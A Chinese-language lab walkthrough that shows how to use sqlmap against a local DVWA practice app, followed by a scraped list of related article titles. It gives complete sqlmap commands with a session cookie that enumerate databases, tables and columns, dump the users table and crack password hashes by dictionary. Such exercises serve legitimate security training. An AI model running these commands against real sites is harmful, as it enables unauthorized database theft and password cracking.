在DVWA页面中选择 SQL Injection


一、首先肯定是要判断是否有注入漏洞,在输入框输入1,返回

ID: 1
First name: admin
Surname: admin


返回正常;

再次输入1',报错,返回

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near " 1' " at line 1


此时可以断定有SQL注入漏洞且为单引号闭合的字符型注入,下面利用SQLMap进行注入攻击。

二、利用Sqlmap工具:

1、先进行基本的测试

python sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/index.php?id=1&Submit=Submit"

-u 参数表示url,指定连接目标

得到提示:


Sqlmap 得到302重定向到 " http://localhost:80/DVWA/login.php "。你想跟上吗?[y/n]

根据该提示,可以判断(302重定向)跳转至登录页面,看来需要带cookie,否则可能无法正常执行。

解释:web应用需要登录的时候需要加 cookie参数

不加则如下:


F12打开控制台,在网络里得到Cookie信息。

PHPSESSID    "lqumo7do6sle0vl4gi7b9qqd57"
security    "low"


加上带cookie参数再次测试:

python sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=lqumo7do6sle0vl4gi7b9qqd57;sec
urity=low"

得到:

the back-end DBMS is MySQL //后台数据库管理系统:MySQL
web server operating system: Windows //Web服务武器操作系统:Windows
web application technology: PHP 5.4.45, Apache 2.4.23 //Web应用技术: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0 //后台数据库:MySQL


发现sqlmap可以跑出数据来了,构造其他语句,继续查取数据。

2、列出数据库信息:

python sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=lqumo7do6sle0vl4gi7b9qqd57;s ecurity=low" --dbs

--dbs 表示列出目标有哪些数据库

得到8个mysql下数据库名:

3、获取当前的数据库:

python sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=lqumo7do6sle0vl4gi7b9qqd57;security=low" --current-db

--current-db得到当前使用的数据库


得到:current database: 'dvwa'

即:当前数据库名为:dvwa

4、获取当前数据库下的表:

python sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=lqumo7do6sle0vl4gi7b9qqd57;security=low" --table -D "dvwa"

--table -D "xxx" :得到xxx数据库下面的表

5、获取数据库dvwa下user表的字段:

python sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=lqumo7do6sle0vl4gi7b9qqd57;security=low" --columns -T "users" -D "dvwa"

--columns -T "" -D "" 得到数据库下面的表下面的列(columns)

得到:

6、获取user表里的字段值:

python sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie "PHPSESSID=lqumo7do6sle0vl4gi7b9qqd57;security=low" --dump -T users -D dvwa

过程中会出现的部分提示信息:

do you want to store hashes to a temporary file for eventual further processing with other tools [y/N]
您是否要将散列存储到临时文件中,以便最终使用其他工具进行进一步处理do you want to crack them via a dictionary-based attack? [Y/n/q]
您是否想通过基于字典的攻击来破解它们?what dictionary do you want to use?
用什么字典来破解?[1] default dictionary file 'C:\WangAn\Sqlmap\txt\wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
回车会直接使用第一个do you want to use common password suffixes? (slow!) [y/N]
您是否要使用通用密码后缀? (慢!)

最终得到:

至此,DVWA 的Low级别的SQL注入漏洞使用SqlMap工具注入完成。

DVWA——Sqlmap练习相关推荐

  1. 实验二、XSS和SQL注入

    一.  实验目的 了解什么是XSS:了解XSS攻击实施,理解防御XSS攻击的方法:了解SQL注入的基本原理:掌握PHP脚本访问MySQL数据库的基本方法:掌握程序设计中避免出现SQL注入漏洞的基本方法 ...

  2. 网络渗透测试实验三 XSS和SQL

    网络渗透测试实验三 XSS和SQL注入 实验目的:了解什么是XSS:思考防御XSS攻击的方法:了解SQL注入的基本原理:掌握PHP脚本访问MySQL数据库的基本方法:掌握程序设计中避免出现SQL注入漏 ...

  3. (超详细)XSS和SQL注入-网络渗透测试实验三

    文章目录 前言 实验目的 系统环境 网络环境 实验工具 XSS部分:利用Beef劫持被攻击者客户端浏览器. 实验环境搭建. 环境搭建参考网站 搭建IIS时踩的坑: 1.利用AWVS扫描留言簿网站,发现 ...

  4. 实验三 XSS和SQL注入

    实验三 XSS和SQL注入 实验目的:了解什么是XSS:了解XSS攻击实施,理解防御XSS攻击的方法:了解SQL注入的基本原理:掌握PHP脚本访问MySQL数据库的基本方法:掌握程序设计中避免出现SQ ...

  5. 网络渗透测试实验三——XSS和SQL注入

    网络渗透测试实验三--XSS和SQL注入 实验目的 了解什么是XSS:了解XSS攻击实施,理解防御XSS攻击的方法:了解SQL注入的基本原理:掌握PHP脚本访问MySQL数据库的基本方法:掌握程序设计 ...

  6. 使用SQLmap对dvwa进行SQL注入测试

    SQLmap工具github链接:https://github.com/sqlmapproject/sqlmap 搭建dvwa环境并启动. windows上需要搭建Python环境,下载sqlmap包 ...

  7. 使用Sqlmap对dvwa进行sql注入测试(初级阶段)

    0.测试准备 1)打开Kali虚拟机终端; 2)打开靶机OWASP,并通过浏览器,输入IP地址进入dvwa的主页,然后选择SQL injection进入SQL注入的测试页面 1.获取DVWA的url和 ...

  8. 自学渗透测试:使用 DVWA 和 SQLmap 探寻 SQL 注入攻击与防范

    数据来源 本文仅用于信息安全学习,请遵守相关法律法规,严禁用于非法途径.若观众因此作出任何危害网络安全的行为,后果自负,与本人无关. 01 耳熟能详的SQ注入是什么?     关于SQL注入漏洞,维基 ...

  9. DVWA——使用sqlmap工具post注入

    目录 环境工具 攻击步骤 一.获取并保存数据包 二.sqlmap注入攻击 1.获取数据库信息 2.获取MySQL数据库中的表 3.获取user表中的字段 4.获取用户名和密码 总结 环境工具 PS:s ...

最新文章

  1. 吐血整理《计算机网络五层协议之物理层(中)》
  2. reportviewer控件mysql_reportviewer控件下载
  3. php与nginx整合
  4. JAVA基础系列:Arrays.sort()
  5. 使用Aop管理所有Valid结构bindingResult
  6. C#:JObject、JArray、JProperty、JValue作用
  7. Atitit 遍历文件夹目录解决方案与规范 attilax总结 1. 规范 2 1.1. 注意的不要同时改变文件夹内容,增删文件。这样获取到的目录list不会变化 2 1.2. 主义中文名称文件读写
  8. 火狐无法安装扩展_立即安装4个Firefox扩展
  9. Java 进制转换 代码
  10. Hibernate主键生成策略
  11. TX-LCN分布式事务
  12. Python 鸡肋面试题总结
  13. bcm5396交换机级联配置_工业以太网交换机的专业术语汇总
  14. excel表格横向纵向变换_WPS表格办公—返回Fisher变换值的FISHER函数
  15. Java菜鸟如何入门?1分钟入门
  16. 如何把python可视化到前端_Python一行代码搞定炫酷可视化,就用这个工具!
  17. yum不能使用了,怎么办?记下来!!!
  18. 腾讯编程比赛的试题,喜欢企鹅和编程的要进!
  19. 气象雷达在民航中的运用
  20. FFmpeg源码分析:视频滤镜介绍(上)

热门文章

  1. 网站使用mysql_使用网站的mysql
  2. 【小白学习C++ 教程】十、C++中指针和内存分配
  3. 五十八、2020美赛C题的思路以及个人Python的解法
  4. docker搭建redis
  5. excel中的vlookup函数
  6. 概率分布的熵归一化(Entropy Normalization)
  7. NeuSomatic:基于深度CNN的肿瘤体细胞突变检测工具
  8. java类与对象的最初理解
  9. php基础标签大全,HTML基础之HTML常用标签
  10. python获取网页源码不完整_python和Ajax在一起了?真的???